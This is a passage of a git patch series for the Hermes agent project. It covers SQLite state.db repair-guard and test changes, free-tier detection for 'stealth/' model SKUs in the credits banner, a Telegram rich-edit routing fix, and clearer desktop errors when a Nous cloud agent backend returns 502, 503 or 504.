identity for a damaged DB file: size + mtime_ns. Hashing a multi-GB corrupt file on every open is exactly the kind of - repeated cost this ledger exists to avoid. - - ``mtime_ns`` was the original third component, justified as "stable for a - file nothing can successfully write to". That premise is false, and it - is the defect that let the 2026-08-18/19 incident run unbounded: on FTS - corruption this module deliberately keeps "canonical writes enabled with - FTS detached", so the gateway kept writing and mtime churned. Every - repair pass re-keyed the ledger and reset the counter to 1 — three real - passes (00:14, 00:35, 00:45) each recorded ``failed_attempts: 1``, so the - cap could never be reached and the damaging surgery could retry forever. - - Device+inode is stable across those writes. ``size`` is retained so an - in-place restore that reuses the inode still reads as a different file. - In WAL mode commits land in the ``-wal`` sidecar, so the main database's - size holds steady between checkpoints — a checkpoint that grows the file - grants a fresh budget, which is the intended "the file materially - changed" signal rather than the per-write churn that broke the cap. + repeated cost this ledger exists to avoid; size+mtime is stable for a + file nothing can successfully write to, and any successful repair, + truncation or manual restore changes it (resetting the attempt count). """ try: st = db_path.stat() - return f"{st.st_dev}:{st.st_ino}:{st.st_size}" + return f"{st.st_size}:{st.st_mtime_ns}" except OSError: return None @@ -2206,76 +2192,6 @@ def _reapply_durability_barriers(conn: sqlite3.Connection) -> bool: return False -def verify_state_db_integrity( - db_path: Path, - *, - max_bytes: int = 2 << 30, -) -> Dict[str, Any]: - """Proactively verify ``db_path``. Returns a report; never raises. - - Repair has only ever run *reactively* — when a caller already hit a - malformed error on open. A database torn in pages that no query happens - to touch stays live and keeps accepting writes until something finally - lands on the damage. On 2026-08-19 that gap was 11 hours: the tear - landed in pages holding rows written at 02:18-02:22 and was not seen - until 13:36, across two gateway restarts that both reported a clean start. - - ``PRAGMA integrity_check`` walks every page, so it is O(file size) — the - same reason :func:`hermes_cli.backup.verify_sqlite_integrity` caps it. - Above ``max_bytes`` this degrades to an O(1) structural probe rather than - pegging a CPU for minutes at gateway startup. - - Report keys: - ``ok`` — False only on positive evidence of damage. - ``problems`` — integrity_check rows that were not "ok". - ``checked`` — "full" | "probe" | "absent" | "error". - """ - report: Dict[str, Any] = {"ok": True, "problems": [], "checked": "absent"} - try: - if not db_path.is_file(): - return report - size = db_path.stat().st_size - if size == 0: - # A zero-byte file is handled by the dedicated zeroed-DB path. - return report - except OSError as exc: - report["checked"] = "error" - report["problems"] = [f"stat failed: {exc}"] - return report - - conn = None - try: - conn = sqlite3.connect(f"file:{db_path}?mode=ro", uri=True, timeout=5.0) - if size > max_bytes: - report["checked"] = "probe" - conn.execute("PRAGMA schema_version").fetchone() - conn.execute("SELECT count(*) FROM sqlite_master").fetchone() - return report - report["checked"] = "full" - rows = conn.execute("PRAGMA integrity_check").fetchall() - problems = [str(r[0]) for r in rows if r and str(r[0]).lower() != "ok"] - if problems: - report["ok"] = False - report["problems"] = problems - except sqlite3.DatabaseError as exc: - # The DB refused to open or parse — positive evidence of damage. - report["ok"] = False - report["checked"] = "error" - report["problems"] = [str(exc)] - except Exception as exc: - # Environmental (permissions, locks): not proof of corruption, so do - # not claim damage — but do not claim health either. - report["checked"] = "error" - report["problems"] = [str(exc)] - finally: - if conn is not None: - try: - conn.close() - except Exception: - pass - return report - - def _db_opens_cleanly(db_path: Path) -> Optional[str]: """Probe a DB on a fresh connection. Returns None if healthy, else a reason. @@ -2416,6 +2332,16 @@ def _live_writer_holds_db(db_path: Path) -> bool: Fails **open** (returns False) on anything other than a positive busy/locked signal: refusing to repair a database that nobody is actually holding would strand the very self-heal path this guard protects. + + Scope: the WAL-index exclusive lock is what makes this detect a holder, so + the guard is effective in WAL mode. On SQLite builds carrying the WAL-reset + bug and on NFS/SMB, Hermes deliberately runs ``state.db`` in + ``journal_mode=DELETE`` (see :func:`apply_wal_with_fallback`); there a held + reader takes only a SHARED lock, ``BEGIN IMMEDIATE`` still acquires + RESERVED, and this probe returns False. In that mode repair is serialised + only by the cross-process repairer lock rather than by this holder probe. + The 2026-08 incident that motivated the guard was in WAL mode, which this + covers; broadening detection to DELETE mode is left to a follow-up. """ probe = None try: diff --git a/tests/test_state_db_repair_live_writer_guard.py b/tests/test_state_db_repair_live_writer_guard.py index e468f1a2ce..8288cb322b 100644 --- a/tests/test_state_db_repair_live_writer_guard.py +++ b/tests/test_state_db_repair_live_writer_guard.py @@ -1,40 +1,31 @@ -"""Regression: the state.db repair path must be bounded and must never run -surgery against a database another connection is still writing. +"""Regression: the state.db repair path must never run surgery against a +database another connection is still writing. Incident (2026-08-18/19): FTS5 shadow-table corruption escalated into b-tree page damage across `system_prompts`, `session_model_usage` and the `sessions` -index. Two defects in this module turned a contained, rebuildable FTS fault -into unrecoverable data loss (292 `delivery_obligations` rows): +index. `repair_state_db_schema` ran its REINDEX/FTS-rebuild strategies while +other connections still held the database open. The caller closes only its own +`self._conn`; the incident process held seven descriptors on state.db. +Rewriting b-tree pages under concurrent writers is what spread the damage out +of the FTS shadow tables and into the canonical tables. -1. `_db_fingerprint` keyed the persistent attempt ledger on ``size:mtime_ns``, - documented as "stable for a file nothing can successfully write to". That - premise is false: on FTS corruption hermes_state deliberately keeps - "canonical writes enabled with FTS detached", so the gateway kept writing - and mtime churned. Every repair pass re-keyed the ledger and reset the - counter to 1 — three real passes (00:14, 00:35, 00:45) all recorded - ``failed_attempts: 1``, so `_MAX_PERSISTENT_REPAIR_ATTEMPTS` could never - be reached and the damaging surgery could retry forever. - -2. `repair_state_db_schema` ran its REINDEX/FTS-rebuild strategies while other - connections still held the database open. The caller closes only its own - `self._conn`; the incident process held seven descriptors on state.db. - Rewriting b-tree pages under concurrent writers is what spread the damage - out of the FTS shadow tables and into the canonical tables. +(The companion repair-attempt-ledger fingerprint fix — keying the budget on +something stable across ongoing writes so the cap can actually be reached — is +tracked separately in the fingerprint/repair-loop salvage PR #88425, which +preserves @jirathip-k's #88224 diagnosis and credit. This file covers only the +live-writer guard.) """ from __future__ import annotations import sqlite3 -import time import uuid from pathlib import Path +import pytest + from hermes_state import ( SessionDB, - _MAX_PERSISTENT_REPAIR_ATTEMPTS, - _db_fingerprint, - _persistent_repair_attempts_exhausted, - _record_repair_outcome, repair_state_db_schema, ) @@ -58,71 +49,28 @@ def _make_wal_db(tmp_path: Path) -> Path: return db -def _write_once(db: Path) -> None: - """Simulate the gateway's ongoing canonical writes (FTS detached).""" - handle = SessionDB(db_path=db) - sid = handle.create_session(session_id=str(uuid.uuid4()), source="cli") - handle.append_message(sid, role="user", content="canonical write") - handle.close() - - # --------------------------------------------------------------------------- -# Defect 1: the ledger fingerprint must survive ongoing writes -# --------------------------------------------------------------------------- - - -def test_fingerprint_is_stable_while_the_gateway_keeps_writing(tmp_path): - """Identity must track the FILE, not its mtime/contents. - - A corrupt state.db still accepts canonical writes, so a mtime- or - content-derived fingerprint changes constantly and silently re-keys the - attempt ledger. - """ - db = _make_wal_db(tmp_path) - before = _db_fingerprint(db) - - time.sleep(0.01) - _write_once(db) - - assert _db_fingerprint(db) == before - - -def test_repair_budget_is_exhausted_despite_ongoing_writes(tmp_path): - """Three failed passes must exhaust the budget even with writes between. - - This is the exact incident shape: three real repair attempts, each - separated by gateway writes, all recorded ``failed_attempts: 1``. - """ - db = _make_wal_db(tmp_path) - - for _ in range(_MAX_PERSISTENT_REPAIR_ATTEMPTS): - _record_repair_outcome(db, repaired=False) - time.sleep(0.01) - _write_once(db) - - assert _persistent_repair_attempts_exhausted(db) is True - - -def test_successful_repair_still_clears_the_budget(tmp_path): - """A healed database must not inherit a spent budget.""" - db = _make_wal_db(tmp_path) - - for _ in range(_MAX_PERSISTENT_REPAIR_ATTEMPTS): - _record_repair_outcome(db, repaired=False) - assert _persistent_repair_attempts_exhausted(db) is True - - _record_repair_outcome(db, repaired=True) - - assert _persistent_repair_attempts_exhausted(db) is False - - -# --------------------------------------------------------------------------- -# Defect 2: repair must refuse to operate under a live writer +# Repair must refuse to operate under a live writer # --------------------------------------------------------------------------- +@pytest.mark.requires_wal def test_repair_refuses_while_another_connection_holds_the_db(tmp_path): - """Surgery under concurrent writers is what spread the corruption.""" + """Surgery under concurrent writers is what spread the corruption. + + Gated on ``requires_wal``: ``_live_writer_holds_db`` detects an + out-of-process holder via ``PRAGMA locking_mode=EXCLUSIVE`` + a + ``BEGIN IMMEDIATE`` that a concurrent connection makes fail with + SQLITE_BUSY through the WAL index. On SQLite builds carrying the + WAL-reset bug (and on NFS/SMB) Hermes deliberately runs ``state.db`` in + ``journal_mode=DELETE``, where a held reader takes only a SHARED lock and + ``BEGIN IMMEDIATE`` can still acquire RESERVED — so the probe cannot see + the holder and the guard fails open. In DELETE mode repair is instead + serialised only by the cross-process repairer lock (see + ``_live_writer_holds_db``'s docstring). The conftest auto-skips this test + where WAL is unusable rather than assert a guarantee the runtime doesn't + make there. + """ db = _make_wal_db(tmp_path) holder = sqlite3.connect(str(db)) diff --git a/tests/test_state_db_write_durability.py b/tests/test_state_db_write_durability.py index fb012ad6a1..eeac5e3e56 100644 --- a/tests/test_state_db_write_durability.py +++ b/tests/test_state_db_write_durability.py @@ -1,5 +1,4 @@ -"""Regression: state.db repair-path writes must be durable on macOS, and a -torn database must be detected proactively rather than 11 hours later. +"""Regression: state.db repair-path writes must be durable on macOS. Incident (2026-08-19, recurrence of 2026-08-18/19): `state.db` was recovered clean at 01:02, tore again in the pages holding rows written 02:18-02:22, and @@ -11,22 +10,21 @@ integrity_check` on the file reported the torn-b-tree signature: Tree 5 page 60788 cell 4: Rowid 34637 out of order Page 50549..52587: never used -Two defects: +The defect: hermes_state already knows macOS `fsync()` does not guarantee +write ordering, and mitigates it with `synchronous=FULL` + +`checkpoint_fullfsync=1` (see `_enforce_macos_synchronous_full`, whose +docstring names this exact failure: "a WAL checkpoint race with process +termination ... can leave the main DB with half-written btree pages"). +Those pragmas are per-connection and were applied only via +`apply_wal_with_fallback()`. The repair path opened `state.db` with a bare +`sqlite3.connect()` five times and then ran REINDEX, VACUUM and +`writable_schema` surgery through it — the operations that rewrite nearly +every page of the file — with no barrier at all. -1. hermes_state already knows macOS `fsync()` does not guarantee write - ordering, and mitigates it with `synchronous=FULL` + - `checkpoint_fullfsync=1` (see `_enforce_macos_synchronous_full`, whose - docstring names this exact failure: "a WAL checkpoint race with process - termination ... can leave the main DB with half-written btree pages"). - Those pragmas are per-connection and were applied only via - `apply_wal_with_fallback()`. The repair path opened `state.db` with a bare - `sqlite3.connect()` five times and then ran REINDEX, VACUUM and - `writable_schema` surgery through it — the operations that rewrite nearly - every page of the file — with no barrier at all. - -2. Repair only ran reactively, when a caller already hit a malformed error - (`SessionDB` open). Nothing checked the file proactively, so a torn - database stayed live and accepted writes for hours before anyone noticed. +(The proactive `verify_state_db_integrity()` gate the original PR #90747 also +carried is deferred to the follow-up that wires it into gateway startup — +PR #91754 — since it ships as dead code without that caller. This file covers +only the repair-connection durability half.) """ from __future__ import annotations @@ -42,7 +40,6 @@ import hermes_state from hermes_state import ( _connect_repair_durable, repair_state_db_schema, - verify_state_db_integrity, ) @@ -148,63 +145,3 @@ def test_repair_still_works_through_durable_connection(tmp_path: Path) -> None: assert conn.execute("SELECT COUNT(*) FROM messages").fetchone()[0] == 1 finally: conn.close() - - -# ── Defect 2: proactive verification gate ─────────────────────────────── - - -def test_verify_state_db_integrity_passes_on_healthy_db(tmp_path: Path) -> None: - db = _make_db(tmp_path) - result = verify_state_db_integrity(db) - assert result["ok"] is True - assert result["problems"] == [] - - -def test_verify_state_db_integrity_detects_torn_btree(tmp_path: Path) -> None: - """A torn database must be reported, not silently accepted.""" - db = _make_db(tmp_path) - # Grow past one page, then corrupt an interior/leaf page directly — the - # same class of damage as "2nd reference to page" / "never used". - conn = sqlite3.connect(str(db)) - conn.execute("PRAGMA journal_mode=DELETE") - conn.executemany( - "INSERT INTO messages (body) VALUES (?)", - [(f"row-{i}" * 40,) for i in range(500)], - ) - conn.commit() - conn.close() - - page_size = 4096 - raw = bytearray(db.read_bytes()) - # Scribble over a data page (page 3+), leaving the header page intact so - # the file still opens — that is what makes this class so long-lived. - start = page_size * 4 - raw[start:start + page_size] = b"\xff" * page_size - db.write_bytes(bytes(raw)) - - result = verify_state_db_integrity(db) - assert result["ok"] is False - assert result["problems"], "torn pages reported no problems" - - -def test_verify_state_db_integrity_skips_pragma_when_oversized( - tmp_path: Path, -) -> None: - """Must degrade to an O(1) probe rather than pegging a CPU for minutes. - - `PRAGMA integrity_check` walks every page, so an unbounded check at - startup would hang the gateway on a multi-GB state.db. - """ - db = _make_db(tmp_path) - result = verify_state_db_integrity(db, max_bytes=1) - assert result["ok"] is True - assert result["checked"] == "probe" - - -def test_verify_state_db_integrity_missing_file_is_not_a_failure( - tmp_path: Path, -) -> None: - """A first run has no state.db yet; that must not look like corruption.""" - result = verify_state_db_integrity(tmp_path / "absent.db") - assert result["ok"] is True - assert result["checked"] == "absent" From 29c90665775cb147ec6965a78accfd493a9a8364 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 04:13:17 +0530 Subject: [PATCH 085/161] chore(state): tidy post-salvage residue in state.db durability test MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Two leftovers from the #91852 descope (integrity-check tests removed but their scaffolding stayed): - Drop the now-unused `import pytest` (orphaned when the verify_state_db_integrity tests that used it were removed; no markers/raises/fixtures remain in this file). - Rename the `# Defect 1:` section label to just `# Repair-path write durability` — the sibling "Defect 2" section was descoped out, leaving the numbering dangling. Test-only, no behavior change. tests/test_state_db_write_durability.py: 4 passed. --- tests/test_state_db_write_durability.py | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/tests/test_state_db_write_durability.py b/tests/test_state_db_write_durability.py index eeac5e3e56..ac306d8254 100644 --- a/tests/test_state_db_write_durability.py +++ b/tests/test_state_db_write_durability.py @@ -34,8 +34,6 @@ import sqlite3 import sys from pathlib import Path -import pytest - import hermes_state from hermes_state import ( _connect_repair_durable, @@ -55,7 +53,7 @@ def _make_db(tmp_path: Path) -> Path: return db -# ── Defect 1: repair-path write durability ────────────────────────────── +# ── Repair-path write durability ──────────────────────────────────────── def test_connect_repair_durable_sets_macos_barriers(tmp_path: Path) -> None: From ad96d2e2d9257a91bffb5f9d9affbf89a7669284 Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:52:16 +0530 Subject: [PATCH 086/161] fix(credits): suppress depleted banner on stealth-preview models MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Stealth-preview SKUs (e.g. stealth/ox-alpha) are free-tier but carry no :free suffix, so is_free_tier_model() returned False for them. On gateway sessions (which never run the model picker's pricing fetch), the free-model suppression of the credits.depleted banner never engaged, and any response carrying paid_access:false triggered a false "Credit access paused" notice. Add stealth/ prefix detection to is_free_tier_model() as a zero-network signal, same design as the existing :free suffix check. Fail-open to False (banner still shows) if the prefix changes — recoverable noise, never a masked depletion on a paid model. Closes #91843 --- agent/credits_tracker.py | 16 ++++++++++-- tests/agent/test_credits_policy.py | 41 ++++++++++++++++++++++++++++++ 2 files changed, 55 insertions(+), 2 deletions(-) diff --git a/agent/credits_tracker.py b/agent/credits_tracker.py index b47c3f274e..5988773044 100644 --- a/agent/credits_tracker.py +++ b/agent/credits_tracker.py @@ -226,12 +226,15 @@ def is_free_tier_model(model: str, base_url: str = "") -> bool: 1. The ``:free`` suffix — the canonical Nous free SKU marker (e.g. ``nvidia/nemotron-3-ultra:free``). Free by construction on the API side (spend is forced to 0 for ``:free`` ids). - 2. A peek into the in-process pricing cache in ``hermes_cli.models`` + 2. The ``stealth/`` prefix — Nous stealth-preview SKUs (e.g. + ``stealth/ox-alpha``) are free-tier but carry no ``:free`` suffix. Spend + is forced to zero server-side, so these are also free by construction. + 3. A peek into the in-process pricing cache in ``hermes_cli.models`` (populated when the model picker fetched ``/v1/models`` pricing for *base_url*). PEEK ONLY — a cache miss never triggers a fetch. This is CLI/TUI-session best-effort: gateway sessions never run the picker's pricing fetch, so suppression there rests entirely on the ``:free`` - suffix (which all Nous free SKUs carry). + suffix and ``stealth/`` prefix. Fail-open to False (the depleted notice still shows) on any error: wrongly showing the warning is recoverable noise; wrongly hiding it on a paid model @@ -241,6 +244,15 @@ def is_free_tier_model(model: str, base_url: str = "") -> bool: return False if model.endswith(":free"): return True + # Stealth-preview SKUs (e.g. stealth/ox-alpha) are free-tier but carry no + # ``:free`` suffix. Spend is forced to zero server-side, so a ``paid_access: + # false`` header on these models is a false positive for the depleted banner. + # The ``stealth/`` prefix is the Nous naming convention for these SKUs and + # is checked here as a zero-network signal, same design as the ``:free`` + # suffix above. Fail-open to False (the banner still shows) if the prefix + # ever changes — recoverable noise, never a masked depletion on a paid model. + if model.startswith("stealth/"): + return True if not base_url: return False try: diff --git a/tests/agent/test_credits_policy.py b/tests/agent/test_credits_policy.py index 45892a7a75..b03e9c28bb 100644 --- a/tests/agent/test_credits_policy.py +++ b/tests/agent/test_credits_policy.py @@ -351,6 +351,47 @@ class TestIsFreeTierModel: monkeypatch.setattr(models_mod, "_pricing_cache", _Exploding()) assert is_free_tier_model("some/model", "https://inference-api.nousresearch.com") is False + def test_stealth_prefix_detected_as_free(self): + """Stealth-preview SKUs (stealth/...) are free-tier but carry no + :free suffix. Suppression must engage so the depleted banner doesn't + fire on a false paid_access:false from the server's stealth pool.""" + from agent.credits_tracker import is_free_tier_model + + # No base_url needed — stealth/ is a zero-network signal, same as :free. + assert is_free_tier_model("stealth/ox-alpha", "") is True + assert is_free_tier_model("stealth/ox-alpha", "https://inference-api.nousresearch.com/v1") is True + # Non-stealth model without :free suffix → not free (without pricing cache). + assert is_free_tier_model("some/paid-model", "") is False + + def test_depleted_suppressed_for_stealth_model(self): + """End-to-end: paid_access:false on a stealth/ model must NOT fire + the depleted banner (the exact scenario from issue #91843).""" + from agent.credits_tracker import ( + CreditsState, evaluate_credits_notices, is_free_tier_model, + ) + + state = CreditsState( + version=1, + remaining_micros=0, + remaining_usd="0.00", + subscription_micros=0, + subscription_usd="0.00", + purchased_micros=0, + purchased_usd="0.00", + paid_access=False, + captured_at=1.0, + from_header=True, + ) + model = "stealth/ox-alpha" + base_url = "https://inference-api.nousresearch.com/v1" + model_is_free = is_free_tier_model(model, base_url) + assert model_is_free is True + + latch = fresh_latch() + to_show, to_clear = evaluate_credits_notices(state, latch, model_is_free=model_is_free) + assert all(n.key != "credits.depleted" for n in to_show) + assert "credits.depleted" not in latch["active"] + # ── Scenario 6: denominator none (uf is None) ──────────────────────────────── From 8a949659c3e5705fe6b6e16b611a7600dbf091de Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 04:12:02 +0530 Subject: [PATCH 087/161] refactor(credits): fold review findings for stealth free-tier fix - credits_tracker: trim inline comment block (duplicated docstring) and correct its safety claim - a paid model under stealth/ would fail closed (suppressed banner), not open; state the trade-off honestly. - run_agent: update stale call-site comment to mention stealth/ prefix. - auxiliary_client: widen sibling free-SKU detector _is_free_model to recognize stealth/ prefix (same bug class as #91843: free_only=true wrongly skipped the OpenRouter fallback and the paid-lane warning fired spuriously for stealth models). - tests: bind the new sibling behavior (stealth/ox-alpha free, my-stealth/model not). --- agent/auxiliary_client.py | 7 +++++-- agent/credits_tracker.py | 10 +++------- run_agent.py | 3 ++- tests/agent/test_auxiliary_client.py | 3 +++ 4 files changed, 13 insertions(+), 10 deletions(-) diff --git a/agent/auxiliary_client.py b/agent/auxiliary_client.py index 7322a14b9a..31e99c0e5b 100644 --- a/agent/auxiliary_client.py +++ b/agent/auxiliary_client.py @@ -2830,8 +2830,11 @@ _paid_lane_warned: set = set() def _is_free_model(model: Optional[str]) -> bool: - """True when ``model`` is an OpenRouter free SKU (``:free`` suffix).""" - return bool(model) and str(model).strip().endswith(":free") + """True when ``model`` is a free SKU (``:free`` suffix or ``stealth/`` prefix).""" + if not model: + return False + normalized = str(model).strip() + return normalized.endswith(":free") or normalized.startswith("stealth/") def _aux_openrouter_settings() -> Tuple[bool, str]: diff --git a/agent/credits_tracker.py b/agent/credits_tracker.py index 5988773044..39c74ea58b 100644 --- a/agent/credits_tracker.py +++ b/agent/credits_tracker.py @@ -244,13 +244,9 @@ def is_free_tier_model(model: str, base_url: str = "") -> bool: return False if model.endswith(":free"): return True - # Stealth-preview SKUs (e.g. stealth/ox-alpha) are free-tier but carry no - # ``:free`` suffix. Spend is forced to zero server-side, so a ``paid_access: - # false`` header on these models is a false positive for the depleted banner. - # The ``stealth/`` prefix is the Nous naming convention for these SKUs and - # is checked here as a zero-network signal, same design as the ``:free`` - # suffix above. Fail-open to False (the banner still shows) if the prefix - # ever changes — recoverable noise, never a masked depletion on a paid model. + # Stealth-preview SKUs are free-tier but carry no ``:free`` suffix (see + # docstring point 2). Naming-convention trust: if a PAID model ever shipped + # under ``stealth/`` this would wrongly suppress the banner on it. if model.startswith("stealth/"): return True if not base_url: diff --git a/run_agent.py b/run_agent.py index 6237738141..6704ad7cbd 100644 --- a/run_agent.py +++ b/run_agent.py @@ -4251,7 +4251,8 @@ class AIAgent: latch = self._credits_latch = new_credits_latch() # Free-model gate: a depleted account on a free model can still # inference, so the depleted error banner is suppressed. Local-data - # only (":free" suffix + pricing-cache peek) — never a network call. + # only (":free" suffix, "stealth/" prefix + pricing-cache peek) — + # never a network call. model_is_free = is_free_tier_model( getattr(self, "model", "") or "", getattr(self, "base_url", "") or "", diff --git a/tests/agent/test_auxiliary_client.py b/tests/agent/test_auxiliary_client.py index ad4966acaa..238c9e5038 100644 --- a/tests/agent/test_auxiliary_client.py +++ b/tests/agent/test_auxiliary_client.py @@ -1071,7 +1071,10 @@ class TestOpenRouterPaidLaneGuard: def test_is_free_model(self): from agent.auxiliary_client import _is_free_model assert _is_free_model("nvidia/nemotron-3-ultra-550b-a55b:free") + # Stealth-preview SKUs are free-tier without a :free suffix (issue #91843). + assert _is_free_model("stealth/ox-alpha") assert not _is_free_model("google/gemini-3.6-flash") + assert not _is_free_model("my-stealth/model") assert not _is_free_model("") assert not _is_free_model(None) From b6bcb3e791c673e63974029bbab40cc9326803ff Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Sat, 22 Aug 2026 04:16:58 +0530 Subject: [PATCH 088/161] docs(credits): document naming-convention trust in aux free-SKU detector Mirror the credits_tracker caveat in _is_free_model (a paid stealth/ model would bypass the free_only gate and paid-lane warning) and fix the stale _warn_paid_lane_once docstring. --- agent/auxiliary_client.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/agent/auxiliary_client.py b/agent/auxiliary_client.py index 31e99c0e5b..b5aeae274f 100644 --- a/agent/auxiliary_client.py +++ b/agent/auxiliary_client.py @@ -2830,7 +2830,11 @@ _paid_lane_warned: set = set() def _is_free_model(model: Optional[str]) -> bool: - """True when ``model`` is a free SKU (``:free`` suffix or ``stealth/`` prefix).""" + """True when ``model`` is a free SKU (``:free`` suffix or ``stealth/`` prefix). + + Naming-convention trust: a paid model shipped under ``stealth/`` would + silently bypass both the free_only gate and the paid-lane warning. + """ if not model: return False normalized = str(model).strip() @@ -2856,7 +2860,8 @@ def _aux_openrouter_settings() -> Tuple[bool, str]: def _warn_paid_lane_once(model: str) -> None: - """Log a WARNING the first time a non-:free OpenRouter model is engaged.""" + """Log a WARNING the first time a non-free (neither ``:free`` nor + ``stealth/``) OpenRouter model is engaged.""" if model in _paid_lane_warned: return _paid_lane_warned.add(model) From e9a7c7aa4dbdc7e522d0fa9c9c8f457c3cf3b37c Mon Sep 17 00:00:00 2001 From: Gille <4317663+helix4u@users.noreply.github.com> Date: Fri, 21 Aug 2026 18:29:08 -0600 Subject: [PATCH 089/161] fix(telegram): omit topic routing from rich edits --- plugins/platforms/telegram/adapter.py | 13 +++----- tests/gateway/test_telegram_rich_messages.py | 35 ++++++++++++++++++++ 2 files changed, 39 insertions(+), 9 deletions(-) diff --git a/plugins/platforms/telegram/adapter.py b/plugins/platforms/telegram/adapter.py index 1642ee039e..464ee389fc 100644 --- a/plugins/platforms/telegram/adapter.py +++ b/plugins/platforms/telegram/adapter.py @@ -2363,15 +2363,10 @@ class TelegramAdapter(BasePlatformAdapter): "message_id": int(message_id), "rich_message": self._rich_message_payload(content), } - thread_id = self._metadata_thread_id(metadata) - thread_kwargs = self._thread_kwargs_for_send( - chat_id, - thread_id, - metadata, - reply_to_message_id=None, - reply_to_mode=self._reply_to_mode, - ) - payload.update({k: v for k, v in thread_kwargs.items() if v is not None}) + # Edits target an existing message by chat_id + message_id. Topic + # routing belongs only on send endpoints; forwarding message_thread_id + # or direct_messages_topic_id makes Telegram reject this rich edit and + # sends the caller through the legacy table-to-bullets fallback. if getattr(self, "_disable_link_previews", False): payload["link_preview_options"] = {"is_disabled": True} try: diff --git a/tests/gateway/test_telegram_rich_messages.py b/tests/gateway/test_telegram_rich_messages.py index 1e895eee69..932bce1827 100644 --- a/tests/gateway/test_telegram_rich_messages.py +++ b/tests/gateway/test_telegram_rich_messages.py @@ -677,6 +677,41 @@ async def test_finalize_edit_uses_rich_for_table_content(): adapter._bot.delete_message.assert_not_called() +@pytest.mark.asyncio +async def test_finalize_edit_dm_topic_omits_send_only_routing_fields(): + """DM-topic metadata must not make a rich edit look like a new send. + + Telegram identifies an edit by chat_id + message_id. Passing topic-routing + fields on editMessageText rejects the rich request, after which the legacy + formatter permanently rewrites the table into bullet groups. + """ + adapter = _make_adapter() + + async def _api(endpoint, api_kwargs=None, **kwargs): + assert endpoint == "editMessageText" + has_send_routing = ( + "message_thread_id" in api_kwargs + or "direct_messages_topic_id" in api_kwargs + ) + if has_send_routing: + raise BadRequest("unexpected topic routing on editMessageText") + return True + + adapter._bot.do_api_request = AsyncMock(side_effect=_api) + + result = await adapter.edit_message( + "12345", "555", TOPIC_TABLE, finalize=True, metadata=TOPIC_METADATA, + ) + + assert result.success is True + api_kwargs = _rich_edit_kwargs(adapter) + assert api_kwargs["message_id"] == 555 + assert "message_thread_id" not in api_kwargs + assert "direct_messages_topic_id" not in api_kwargs + assert "| F1 |" in api_kwargs["rich_message"]["markdown"] + adapter._bot.edit_message_text.assert_not_called() + + @pytest.mark.asyncio async def test_legacy_edit_error_logs_redacted_bot_token_without_traceback(monkeypatch, caplog): import agent.redact as redact From 274158ec13406a3079ebde9c1f33979238db896b Mon Sep 17 00:00:00 2001 From: "Axl Ibiza, MBA" Date: Thu, 13 Aug 2026 09:54:01 -0500 Subject: [PATCH 090/161] fix(desktop): surface actionable error when Nous Cloud agent returns 503 (#85335) When a Hermes Desktop connects to a Nous-managed cloud agent (*.agents.nousresearch.com) and that backend returns HTTP 502/503/504, the previous error message was the opaque generic 'Hermes backend did not become ready: 503: ...' with no guidance that the cloud server itself is down. Add isServerSideHttpError and isNousCloudAgentUrl helpers and use them in waitForHermesReady to detect this exact scenario. When triggered, throw an error with the hostname, status code, and recovery paths: check the Nous Portal, switch to Local mode, or reach out on Discord. Also adds a isCloudBackendDown flag and statusCode property on the thrown error so the renderer overlay can render specialized UI if desired. --- apps/desktop/electron/backend-health.test.ts | 102 +++++++++++++++++++ apps/desktop/electron/backend-health.ts | 67 ++++++++++++ 2 files changed, 169 insertions(+) diff --git a/apps/desktop/electron/backend-health.test.ts b/apps/desktop/electron/backend-health.test.ts index 8d29ea1988..a6e370b5f9 100644 --- a/apps/desktop/electron/backend-health.test.ts +++ b/apps/desktop/electron/backend-health.test.ts @@ -7,7 +7,9 @@ import { isAuthRejectionError, isGatedMissingHealthError, isMissingHealthEndpointError, + isNousCloudAgentUrl, isReauthRequiredError, + isServerSideHttpError, waitForHermesReady } from './backend-health' @@ -338,3 +340,103 @@ test('error-shape predicates', () => { // A gated 401 must NOT be conflated with a missing route by the 404 predicate. assert.equal(isMissingHealthEndpointError(new Error(GATE_401)), false) }) + +test('isServerSideHttpError detects 502/503/504', () => { + // 503 — server-side fault + const result503 = isServerSideHttpError(new Error('503: Service Unavailable')) + assert.ok(result503, 'should detect 503') + assert.equal(result503?.statusCode, 503) + assert.equal(result503?.detail, '503: Service Unavailable') + + // 502 + const result502 = isServerSideHttpError(new Error('502: Bad Gateway')) + assert.ok(result502, 'should detect 502') + assert.equal(result502?.statusCode, 502) + + // 504 + const result504 = isServerSideHttpError(new Error('504: Gateway Timeout')) + assert.ok(result504, 'should detect 504') + assert.equal(result504?.statusCode, 504) + + // 500 is NOT a server-side HTTP error per our definition (keeps polling) + const result500 = isServerSideHttpError(new Error('500: Internal Server Error')) + assert.equal(result500, null) + + // 401/403/404/429 are not server-side faults + assert.equal(isServerSideHttpError(new Error('401: Unauthorized')), null) + assert.equal(isServerSideHttpError(new Error('403: Forbidden')), null) + assert.equal(isServerSideHttpError(new Error('404: Not Found')), null) + assert.equal(isServerSideHttpError(new Error('429: Too Many Requests')), null) + + // Non-HTTP errors (timeouts, network failures) don't match the pattern + assert.equal(isServerSideHttpError(new Error('connect ECONNREFUSED')), null) + assert.equal(isServerSideHttpError(null), null) + assert.equal(isServerSideHttpError('503: something'), null) // not an Error +}) + +test('isNousCloudAgentUrl detects cloud agent hosts', () => { + // Positive cases + assert.equal(isNousCloudAgentUrl('https://ares-3009.agents.nousresearch.com'), true) + assert.equal(isNousCloudAgentUrl('https://ares-3009.agents.nousresearch.com/api/health'), true) + assert.equal(isNousCloudAgentUrl('http://test.agents.nousresearch.com'), true) + + // Negative cases + assert.equal(isNousCloudAgentUrl('http://127.0.0.1:9000'), false) + assert.equal(isNousCloudAgentUrl('https://gateway.example.com'), false) + assert.equal(isNousCloudAgentUrl('https://nousresearch.com'), false) + 